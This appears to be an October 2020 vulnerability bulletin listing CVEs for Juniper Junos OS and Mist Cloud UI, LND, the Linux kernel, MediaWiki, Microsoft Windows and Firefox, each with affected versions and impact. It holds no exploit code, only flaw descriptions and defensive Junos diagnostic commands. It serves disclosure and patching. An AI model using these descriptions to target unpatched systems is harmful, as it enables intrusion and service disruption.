juniper_networks — junos_os	Juniper Networks Junos OS and Junos OS Evolved fail to drop/discard delayed MACsec packets (e.g. delayed by more than 2 seconds). Per the specification, called the “bounded receive delay”, there should be no replies to delayed MACsec packets. Any MACsec traffic delayed more than 2 seconds should be dropped and late drop counters should increment. Without MACsec delay protection, an attacker could exploit the delay to spoof or decrypt packets. This issue affects: Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8, 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S3; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. Juniper Networks Junos OS Evolved: all versions prior to 19.4R3-EVO; 20.1 versions prior to 20.1R2-EVO. This issue does not affect Junos OS versions prior to 16.1R1.	2020-10-16	not yet calculated	CVE-2020-1674 MISC CONFIRM MISC
juniper_networks — junos_os	The DHCPv6 Relay-Agent service, part of the Juniper Enhanced jdhcpd daemon shipped with Juniper Networks Junos OS has an Improper Input Validation vulnerability which will result in a Denial of Service (DoS) condition when a DHCPv6 client sends a specific DHPCv6 message allowing an attacker to potentially perform a Remote Code Execution (RCE) attack on the target device. Continuous receipt of the specific DHCPv6 client message will result in an extended Denial of Service (DoS) condition. If adjacent devices are also configured to relay DHCP packets, and are not affected by this issue and simply transparently forward unprocessed client DHCPv6 messages, then the attack vector can be a Network-based attack, instead of an Adjacent-device attack. No other DHCP services are affected. Receipt of the packet without configuration of the DHCPv6 Relay-Agent service, will not result in exploitability of this issue. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S15; 12.3X48 versions prior to 12.3X48-D95; 14.1X53 versions prior to 14.1X53-D53; 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D200; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S7; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2; 17.2 versions prior to 17.2R3-S3; 17.2X75 versions prior to 17.2X75-D44; 17.3 versions prior to 17.3R3-S7; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R2-S6, 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D435, 18.2X75-D60; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3-S1; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2; 19.2 versions prior to 19.2R1-S3, 19.2R2; 19.3 versions prior to 19.3R2.	2020-10-16	not yet calculated	CVE-2020-1656 CONFIRM MISC MISC MISC
juniper_networks — junos_os	On Juniper Networks Junos OS platforms configured as DHCPv6 local server or DHCPv6 Relay Agent, Juniper Networks Dynamic Host Configuration Protocol Daemon (JDHCPD) process might crash with a core dump if a malformed DHCPv6 packet is received, resulting with the restart of the daemon. This issue only affects DHCPv6, it does not affect DHCPv4. This issue affects: Juniper Networks Junos OS 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.2 version 19.2R2 and later versions; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2; This issue does not affect Juniper Networks Junos OS prior to 17.4R1.	2020-10-16	not yet calculated	CVE-2020-1671 CONFIRM
juniper_networks — junos_os	On Juniper Networks Junos OS devices configured as a DHCP forwarder, the Juniper Networks Dynamic Host Configuration Protocol Daemon (jdhcp) process might crash when receiving a malformed DHCP packet. This issue only affects devices configured as DHCP forwarder with forward-only option, that forward specified DHCP client packets, without creating a new subscriber session. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of the malformed DHCP packet will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. This issue can be triggered only by DHCPv4, it cannot be triggered by DHCPv6. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S16; 12.3X48 versions prior to 12.3X48-D105 on SRX Series; 14.1X53 versions prior to 14.1X53-D60 on EX and QFX Series; 15.1 versions prior to 15.1R7-S7; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230 on SRX Series; 15.1X53 versions prior to 15.1X53-D593 on EX2300/EX3400; 16.1 versions prior to 16.1R7-S5.	2020-10-16	not yet calculated	CVE-2020-1661 CONFIRM
juniper_networks — junos_os	On Juniper Networks Junos OS and Junos OS Evolved devices, BGP session flapping can lead to a routing process daemon (RPD) crash and restart, limiting the attack surface to configured BGP peers. This issue only affects devices with BGP damping in combination with accepted-prefix-limit configuration. When the issue occurs the following messages will appear in the /var/log/messages: rpd[6046]: %DAEMON-4-BGP_PREFIX_THRESH_EXCEEDED: XXXX (External AS x): Configured maximum accepted prefix-limit threshold(1800) exceeded for inet6-unicast nlri: 1984 (instance master) rpd[6046]: %DAEMON-3-BGP_CEASE_PREFIX_LIMIT_EXCEEDED: 2001:x:x:x::2 (External AS x): Shutting down peer due to exceeding configured maximum accepted prefix-limit(2000) for inet6-unicast nlri: 2001 (instance master) rpd[6046]: %DAEMON-4: bgp_rt_maxprefixes_check_common:9284: NOTIFICATION sent to 2001:x:x:x::2 (External AS x): code 6 (Cease) subcode 1 (Maximum Number of Prefixes Reached) AFI: 2 SAFI: 1 prefix limit 2000 kernel: %KERN-5: mastership_relinquish_on_process_exit: RPD crashed on master RE. Sending SIGUSR2 to chassisd (5612:chassisd) to trigger RE switchover This issue affects: Juniper Networks Junos OS: 17.2R3-S3; 17.3 version 17.3R3-S3 and later versions, prior to 17.3R3-S8; 17.4 version 17.4R2-S4, 17.4R3 and later versions, prior to 17.4R2-S10, 17.4R3-S2; 18.1 version 18.1R3-S6 and later versions, prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions, prior to 18.2R3-S4; 18.2X75 version 18.2X75-D50, 18.2X75-D60 and later versions, prior to 18.2X75-D53, 18.2X75-D65; 18.3 version 18.3R2 and later versions, prior to 18.3R2-S4, 18.3R3-S2; 18.4 version 18.4R2 and later versions, prior to 18.4R2-S5, 18.4R3-S2; 19.1 version 19.1R1 and later versions, prior to 19.1R2-S2, 19.1R3-S1; 19.2 version 19.2R1 and later versions, prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2. Juniper Networks Junos OS Evolved prior to 20.1R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 17.2R3-S3.	2020-10-16	not yet calculated	CVE-2020-1662 CONFIRM
juniper_networks — junos_os_and_junos_os_evolved	On Juniper Networks Junos OS and Junos OS Evolved platforms with EVPN configured, receipt of specific BGP packets causes a slow memory leak. If the memory is exhausted the rpd process might crash. If the issue occurs, the memory leak could be seen by executing the “show task memory detail \| match policy \| match evpn” command multiple times to check if memory (Alloc Blocks value) is increasing. root@device> show task memory detail \| match policy \| match evpn ———————— Allocator Memory Report ———————— Name \| Size \| Alloc DTXP Size \| Alloc Blocks \| Alloc Bytes \| MaxAlloc Blocks \| MaxAlloc Bytes Policy EVPN Params 20 24 3330678 79936272 3330678 79936272 root@device> show task memory detail \| match policy \| match evpn ———————— Allocator Memory Report ———————— Name \| Size \| Alloc DTXP Size \| Alloc Blocks \| Alloc Bytes \| MaxAlloc Blocks \| MaxAlloc Bytes Policy EVPN Params 20 24 36620255 878886120 36620255 878886120 This issue affects: Juniper Networks Junos OS 19.4 versions prior to 19.4R2; 20.1 versions prior to 20.1R1-S4, 20.1R2; Juniper Networks Junos OS Evolved: 19.4 versions; 20.1 versions prior to 20.1R1-S4-EVO, 20.1R2-EVO; 20.2 versions prior to 20.2R1-EVO; This issue does not affect: Juniper Networks Junos OS releases prior to 19.4R1. Juniper Networks Junos OS Evolved releases prior to 19.4R1-EVO.	2020-10-16	not yet calculated	CVE-2020-1678 CONFIRM
juniper_networks — junos_os_devices	On Juniper Networks Junos OS devices, a specific SNMP OID poll causes a memory leak which over time leads to a kernel crash (vmcore). Prior to the kernel crash other processes might be impacted, such as failure to establish SSH connection to the device. The administrator can monitor the output of the following command to check if there is memory leak caused by this issue: user@device> show system virtual-memory \| match “pfe_ipc\|kmem” pfe_ipc 147 5K – 164352 16,32,64,8192 <– increasing vm.kmem_map_free: 127246336 <– decreasing pfe_ipc 0 0K – 18598 32,8192 vm.kmem_map_free: 134582272 This issue affects Juniper Networks Junos OS: 17.4R3; 18.1 version 18.1R3-S5 and later versions prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions prior to 18.2R3-S3; 18.2X75 version 18.2X75-D420, 18.2X75-D50 and later versions prior to 18.2X75-D430, 18.2X75-D53, 18.2X75-D60; 18.3 version 18.3R3 and later versions prior to 18.3R3-S2; 18.4 version 18.4R1-S4, 18.4R2 and later versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 version 19.1R2 and later versions prior to 19.1R2-S2, 19.1R3; 19.2 version 19.2R1 and later versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 17.4R3.	2020-10-16	not yet calculated	CVE-2020-1683 CONFIRM
juniper_networks — junos_os_devices	On Juniper Networks Junos OS devices, receipt of a malformed IPv6 packet may cause the system to crash and restart (vmcore). This issue can be trigged by a malformed IPv6 packet destined to the Routing Engine or a transit packet that is sampled using sFlow/jFlow or processed by firewall filter with the syslog and/or log action. An attacker can repeatedly send the offending packet resulting in an extended Denial of Service condition. Only IPv6 packets can trigger this issue. IPv4 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS 18.4 versions prior to 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 18.4R1.	2020-10-16	not yet calculated	CVE-2020-1686 CONFIRM
juniper_networks — junos_os_devices	On SRX Series devices, a vulnerability in the key-management-daemon (kmd) daemon of Juniper Networks Junos OS allows an attacker to spoof packets targeted to IPSec peers before a security association (SA) is established thereby causing a failure to set up the IPSec channel. Sustained receipt of these spoofed packets can cause a sustained Denial of Service (DoS) condition. This issue affects IPv4 and IPv6 implementations. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D90; 15.1X49 versions prior to 15.1X49-D190; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S6, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2. This issue does not affect 12.3 or 15.1 releases which are non-SRX Series releases.	2020-10-16	not yet calculated	CVE-2020-1657 CONFIRM
juniper_networks — mist_cloud_ui	When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle child elements in SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020.	2020-10-16	not yet calculated	CVE-2020-1677 CONFIRM
juniper_networks — mist_cloud_ui	When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020.	2020-10-16	not yet calculated	CVE-2020-1676 CONFIRM
juniper_networks — mist_cloud_ui	When Security Assertion Markup Language (SAML) authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly process invalid authentication certificates which could allow a malicious network-based user to access unauthorized data. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020.	2020-10-16	not yet calculated	CVE-2020-1675 CONFIRM
juniper_networks — multiple_devices	On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in (Ethernet VPN) EVPN-(Virtual Extensible LAN) VXLAN configuration, receipt of a stream of specific VXLAN encapsulated layer 2 frames can cause high CPU load, which could lead to network protocol operation issue and traffic interruption. This issue affects devices that are configured as a Layer 2 or Layer 3 gateway of an EVPN-VXLAN deployment. The offending layer 2 frames that cause the issue originate from a different access switch that get encapsulated within the same EVPN-VXLAN domain. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1687 CONFIRM
juniper_networks — multiple_devices	On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in a Virtual Chassis configuration, receipt of a stream of specific layer 2 frames can cause high CPU load, which could lead to traffic interruption. This issue does not occur when the device is deployed in Stand Alone configuration. The offending layer 2 frame packets can originate only from within the broadcast domain where the device is connected. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1689 CONFIRM
juniper_networks — mx_series_and_ex9200_series_devices	On Juniper Networks MX Series and EX9200 Series, in a certain condition the IPv6 Distributed Denial of Service (DDoS) protection might not take affect when it reaches the threshold condition. The DDoS protection allows the device to continue to function while it is under DDoS attack, protecting both the Routing Engine (RE) and the Flexible PIC Concentrator (FPC) during the DDoS attack. When this issue occurs, the RE and/or the FPC can become overwhelmed, which could disrupt network protocol operations and/or interrupt traffic. This issue does not affect IPv4 DDoS protection. This issue affects MX Series and EX9200 Series with Trio-based PFEs (Packet Forwarding Engines). Please refer to https://kb.juniper.net/KB25385 for the list of Trio-based PFEs. This issue affects Juniper Networks Junos OS on MX series and EX9200 Series: 17.2 versions prior to 17.2R3-S4; 17.2X75 versions prior to 17.2X75-D102, 17.2X75-D110; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.2 versions prior to 18.2R2-S7, 18.2R3, 18.2R3-S3; 18.2X75 versions prior to 18.2X75-D30; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2.	2020-10-16	not yet calculated	CVE-2020-1665 CONFIRM MISC
juniper_networks — mx_series_devices	On Juniper Networks MX Series with MS-MIC or MS-MPC card configured with NAT64 configuration, receipt of a malformed IPv6 packet may crash the MS-PIC component on MS-MIC or MS-MPC. This issue occurs when a multiservice card is translating the malformed IPv6 packet to IPv4 packet. An unauthenticated attacker can continuously send crafted IPv6 packets through the device causing repetitive MS-PIC process crashes, resulting in an extended Denial of Service condition. This issue affects Juniper Networks Junos OS on MX Series: 15.1 versions prior to 15.1R7-S7; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S6; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D41, 18.2X75-D430, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R2-S5, 18.4R3; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2.	2020-10-16	not yet calculated	CVE-2020-1680 CONFIRM
juniper_networks — nfx350_series_devices	The Juniper Device Manager (JDM) container, used by the disaggregated Junos OS architecture on Juniper Networks NFX350 Series devices, stores password hashes in the world-readable file /etc/passwd. This is not a security best current practice as it can allow an attacker with access to the local filesystem the ability to brute-force decrypt password hashes stored on the system. This issue affects Juniper Networks Junos OS on NFX350: 19.4 versions prior to 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1669 CONFIRM
juniper_networks — ptx/qfx_series_devices	On Juniper Networks PTX and QFX Series devices with packet sampling configured using tunnel-observation mpls-over-udp, sampling of a malformed packet can cause the Kernel Routing Table (KRT) queue to become stuck. KRT is the module within the Routing Process Daemon (RPD) that synchronized the routing tables with the forwarding tables in the kernel. This table is then synchronized to the Packet Forwarding Engine (PFE) via the KRT queue. Thus, when KRT queue become stuck, it can lead to unexpected packet forwarding issues. An administrator can monitor the following command to check if there is the KRT queue is stuck: user@device > show krt state … Number of async queue entries: 65007 <— this value keep on increasing. When this issue occurs, the following message might appear in the /var/log/messages: DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Too many delayed route/nexthop unrefs. Op 2 err 55, rtsm_id 5:-1, msg type 2 DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Memory usage of M_RTNEXTHOP type = (0) Max size possible for M_RTNEXTHOP type = (7297134592) Current delayed unref = (60000), Current unique delayed unref = (18420), Max delayed unref on this platform = (40000) Current delayed weight unref = (60000) Max delayed weight unref on this platform= (400000) curproc = rpd This issue affects Juniper Networks Junos OS on PTX/QFX Series: 17.2X75 versions prior to 17.2X75-D105; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.2X75 versions prior to 18.2X75-D420, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1.	2020-10-16	not yet calculated	CVE-2020-1679 CONFIRM
juniper_networks — qfx5k_series_devices	When configuring stateless firewall filters in Juniper Networks EX4600 and QFX 5000 Series devices using Virtual Extensible LAN protocol (VXLAN), the discard action will fail to discard traffic under certain conditions. Given a firewall filter configuration similar to: family ethernet-switching { filter L2-VLAN { term ALLOW { from { user-vlan-id 100; } then { accept; } } term NON-MATCH { then { discard; } } when there is only one term containing a ‘user-vlan-id’ match condition, and no other terms in the firewall filter except discard, the discard action for non-matching traffic will only discard traffic with the same VLAN ID specified under ‘user-vlan-id’. Other traffic (e.g. VLAN ID 200) will not be discarded. This unexpected behavior can lead to unintended traffic passing through the interface where the firewall filter is applied. This issue only affects systems using VXLANs. This issue affects Juniper Networks Junos OS on QFX5K Series: 18.1 versions prior to 18.1R3-S7, except 18.1R3; 18.2 versions prior to 18.2R2-S7, 18.2R3-S1; 18.3 versions prior to 18.3R1-S5, 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S1, 18.4R3; 19.1 versions prior to 19.1R1-S5, 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2.	2020-10-16	not yet calculated	CVE-2020-1685 CONFIRM
juniper_networks — srx_series_and_nfx_series_devices	On Juniper Networks SRX Series and NFX Series, a local authenticated user with access to the shell may obtain the Web API service private key that is used to provide encrypted communication between the Juniper device and the authenticator services. Exploitation of this vulnerability may allow an attacker to decrypt the communications between the Juniper device and the authenticator service. This Web API service is used for authentication services such as the Juniper Identity Management Service, used to obtain user identity for Integrated User Firewall feature, or the integrated ClearPass authentication and enforcement feature. This issue affects Juniper Networks Junos OS on Networks SRX Series and NFX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D190; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S7; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S4, 19.2R2.	2020-10-16	not yet calculated	CVE-2020-1688 MISC CONFIRM MISC MISC MISC
juniper_networks — srx_series_devices	On Juniper Networks SRX Series configured with application identification inspection enabled, receipt of specific HTTP traffic can cause high CPU load utilization, which could lead to traffic interruption. Application identification is enabled by default and is automatically turned on when Intrusion Detection and Prevention (IDP), AppFW, AppQoS, or AppTrack is configured. Thus, this issue might occur when IDP, AppFW, AppQoS, or AppTrack is configured. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230; 17.4 versions prior to 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 versions prior to 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2.	2020-10-16	not yet calculated	CVE-2020-1684 CONFIRM
levistudiou — release_build	An XXE vulnerability exists within LeviStudioU Release Build 2019-09-21 and prior when processing parameter entities, which may allow file disclosure.	2020-10-22	not yet calculated	CVE-2020-25186 MISC
lightning_network_daemon — lightning_network_daemon	Prior to 0.11.0-beta, LND (Lightning Network Daemon) had a vulnerability in its invoice database. While claiming on-chain a received HTLC output, it didn’t verify that the corresponding outgoing off-chain HTLC was already settled before releasing the preimage. In the case of a hash-and-amount collision with an invoice, the preimage for an expected payment was instead released. A malicious peer could have deliberately intercepted an HTLC intended for the victim node, probed the preimage through a colluding relayed HTLC, and stolen the intercepted HTLC. The impact is a loss of funds in certain situations, and a weakening of the victim’s receiver privacy.	2020-10-21	not yet calculated	CVE-2020-26896 MISC MISC MISC
lightning_network_daemon — lightning_network_daemon	Prior to 0.10.0-beta, LND (Lightning Network Daemon) would have accepted a counterparty high-S signature and broadcast tx-relay invalid local commitment/HTLC transactions. This can be exploited by any peer with an open channel regardless of the victim situation (e.g., routing node, payment-receiver, or payment-sender). The impact is a loss of funds in certain situations.	2020-10-21	not yet calculated	CVE-2020-26895 MISC MISC MISC
linux — linux_kernel	An issue was discovered in the Linux kernel through 5.9.1, as used with Xen through 4.14.x. drivers/xen/events/events_base.c allows event-channel removal during the event-handling loop (a race condition). This can cause a use-after-free or NULL pointer dereference, as demonstrated by a dom0 crash via events for an in-reconfiguration paravirtualized device, aka CID-073d0552ead5.	2020-10-22	not yet calculated	CVE-2020-27675 MISC MISC MISC
linux — linux_kernel	An issue was discovered in the Linux kernel through 5.9.1, as used with Xen through 4.14.x. Guest OS users can cause a denial of service (host OS hang) via a high rate of events to dom0, aka CID-e99502f76271.	2020-10-22	not yet calculated	CVE-2020-27673 MISC MISC MISC
linux — linux_kernel	An issue was discovered in the Linux kernel before 5.8.15. scalar32_min_max_or in kernel/bpf/verifier.c mishandles bounds tracking during use of 64-bit values, aka CID-5b9fbeb75b6a.	2020-10-16	not yet calculated	CVE-2020-27194 MISC MISC
mark_text — mark_text	Mutation XSS exists in Mark Text through 0.16.2 that leads to Remote Code Execution. NOTE: this might be considered a duplicate of CVE-2020-26870; however, it can also be considered an issue in the design of the “source code mode” feature, which parses HTML even though HTML support is not one of the primary advertised roles of the product.	2020-10-16	not yet calculated	CVE-2020-27176 MISC
mediawiki — mediawiki	The Cosmos Skin for MediaWiki through 1.35.0 has stored XSS because MediaWiki messages were not being properly escaped. This is related to wfMessage and Html::rawElement, as demonstrated by CosmosSocialProfile::getUserGroups.	2020-10-22	not yet calculated	CVE-2020-27620 MISC MISC MISC MISC
mediawiki — mediawiki	The FileImporter extension in MediaWiki through 1.35.0 was not properly attributing various user actions to a specific user’s IP address. Instead, for various actions, it would report the IP address of an internal Wikimedia Foundation server by omitting X-Forwarded-For data. This resulted in an inability to properly audit and attribute various user actions performed via the FileImporter extension.	2020-10-22	not yet calculated	CVE-2020-27621 MISC MISC
micro_focus — operation_bridge_manager	An arbitrary code execution vulnerability exists in Micro Focus Operation Bridge Manager 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, versions 10.6x and 10.1x and older versions. The vulnerability could allow remote attackers to execute arbitrary code.	2020-10-22	not yet calculated	CVE-2020-11853 MISC
microchip — cryptoauthlib	Microchip CryptoAuthentication Library CryptoAuthLib prior to 20191122 has a Buffer Overflow (issue 2 of 2).	2020-10-22	not yet calculated	CVE-2019-16129 MLIST MISC MISC
microchip — cryptoauthlib	Microchip CryptoAuthentication Library CryptoAuthLib prior to 20191122 has a Buffer Overflow (issue 1 of 2).	2020-10-22	not yet calculated	CVE-2019-16128 MLIST MISC MISC
microsoft — azure_functions	An elevation of privilege vulnerability exists in the way Azure Functions validate access keys.An unauthenticated attacker who successfully exploited this vulnerability could invoke an HTTP Function without proper authorization.This security update addresses the vulnerability by correctly validating access keys used to access HTTP Functions., aka ‘Azure Functions Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16904 MISC
microsoft — windows	On Windows the Veyon Service before version 4.4.2 contains an unquoted service path vulnerability, allowing locally authenticated users with administrative privileges to run malicious executables with LocalSystem privileges. Since Veyon users (both students and teachers) usually don’t have administrative privileges, this vulnerability is only dangerous in anyway unsafe setups. The problem has been fixed in version 4.4.2. As a workaround, the exploitation of the vulnerability can be prevented by revoking administrative privileges from all potentially untrustworthy users.	2020-10-19	not yet calculated	CVE-2020-15261 MISC MISC CONFIRM
microsoft — windows_10	An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior.A locally authenticated attacker could run arbitrary code with elevated system privileges, aka ‘Windows Installer Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16902 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in the way that the Windows kernel image handles objects in memory.An attacker who successfully exploited the vulnerability could execute code with elevated permissions.To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.The security update addresses the vulnerability by ensuring the Windows kernel image properly handles objects in memory., aka ‘Windows Image Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16892 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory, aka ‘Windows Network Connections Service Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16887 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Event System improperly handles objects in memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Event System Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16900 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka ‘Windows COM Server Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16935.	2020-10-16	not yet calculated	CVE-2020-16916 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Storage VSP Driver improperly handles file operations, aka ‘Windows Storage VSP Driver Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16885 MISC
microsoft — windows_10	An information disclosure vulnerability exists when the Windows KernelStream improperly handles objects in memory, aka ‘Windows KernelStream Information Disclosure Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16889 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka ‘Windows Kernel Elevation of Privilege Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16890 MISC
mozilla — firefox	When a link to an external protocol was clicked, a prompt was presented that allowed the user to choose what application to open it in. An attacker could induce that prompt to be associated with an origin they didn’t control, resulting in a spoofing attack. This was fixed by changing external protocol prompts to be tab-modal while also ensuring they could not be incorrectly associated with a different origin. This vulnerability affects Firefox < 82.	2020-10-22	not yet calculated	CVE-2020-15682 MISC MISC
